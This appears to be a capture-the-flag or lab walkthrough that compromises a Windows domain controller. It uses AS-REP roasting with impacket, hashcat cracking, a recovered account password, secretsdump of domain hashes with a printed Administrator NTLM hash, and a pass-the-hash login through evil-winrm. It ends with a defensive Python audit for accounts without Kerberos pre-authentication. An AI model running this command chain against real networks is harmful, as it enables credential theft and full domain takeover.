machine ip : 172.31.3.6
my ip : 10.10.0.33

### port information

```
Open 172.31.3.6:53
Open 172.31.3.6:88
Open 172.31.3.6:135
Open 172.31.3.6:139
Open 172.31.3.6:389
Open 172.31.3.6:445
Open 172.31.3.6:464
Open 172.31.3.6:593
Open 172.31.3.6:636
Open 172.31.3.6:3268
Open 172.31.3.6:3269
Open 172.31.3.6:3389
Open 172.31.3.6:5985
Open 172.31.3.6:9389
Open 172.31.3.6:47001
Open 172.31.3.6:49665
Open 172.31.3.6:49664
Open 172.31.3.6:49666
Open 172.31.3.6:49669
Open 172.31.3.6:49668
Open 172.31.3.6:49670
Open 172.31.3.6:49673
Open 172.31.3.6:49674
Open 172.31.3.6:49691
Open 172.31.3.6:49699
```

ldap

```
sync.csl
SYNC
sync.sync.csl
```

### user

```
impacket-GetNPUsers -no-pass -dc-ip 172.31.3.6 sync.csl/ -usersfile users.txt
```

```
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
```

manager : !!MILKSHAKE!!

```
impacket-secretsdump sync.csl/manager:'!!MILKSHAKE!!'@172.31.3.6
```

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a72e3fae34d37ec6f82d7f2c3a72bc04:::
evil-winrm -i 172.31.3.6 -u 'administrator' -H 'a72e3fae34d37ec6f82d7f2c3a72bc04'
```
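
The foothold above depends on an account that answers AS-REQs without Kerberos pre-authentication, which is what `impacket-GetNPUsers` looks for. The following is an added example, not part of the original notes: a defender-side audit that reads an LDIF export of user objects and lists every account with the `DONT_REQ_PREAUTH` bit set in `userAccountControl`. The sample export, its DNs and the accounts `alice` and `oldsvc` are constructed, and the parser assumes plain `key: value` lines with no folding or base64 values.

```python
import re

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit: Kerberos pre-auth not required
ACCOUNTDISABLE = 0x0002      # userAccountControl bit: account is disabled

# Constructed sample export; DNs and every account except "manager" are made up.
SAMPLE_LDIF = """\
dn: CN=manager,CN=Users,DC=sync,DC=csl
sAMAccountName: manager
userAccountControl: 4260352

dn: CN=alice,CN=Users,DC=sync,DC=csl
sAMAccountName: alice
userAccountControl: 512

dn: CN=oldsvc,CN=Users,DC=sync,DC=csl
sAMAccountName: oldsvc
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Split an LDIF export into one attribute dict per entry (no folded lines)."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        attrs = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                attrs[key.strip().lower()] = value.strip()
        if attrs:
            entries.append(attrs)
    return entries

def preauth_findings(text):
    """Return (account, enabled) for each entry with DONT_REQ_PREAUTH set."""
    findings = []
    for entry in parse_ldif(text):
        try:
            uac = int(entry.get("useraccountcontrol", ""))
        except ValueError:
            continue  # entry carries no usable userAccountControl value
        if uac & DONT_REQ_PREAUTH:
            enabled = not (uac & ACCOUNTDISABLE)
            findings.append((entry.get("samaccountname", "?"), enabled))
    return findings

if __name__ == "__main__":
    for name, enabled in preauth_findings(SAMPLE_LDIF):
        print(f"{name}: pre-auth not required, {'enabled' if enabled else 'disabled'}")
```

Enabled accounts in the result are the ones to fix first: re-enable pre-authentication and rotate the password, since a wordlist password such as the one recovered above falls quickly to offline cracking.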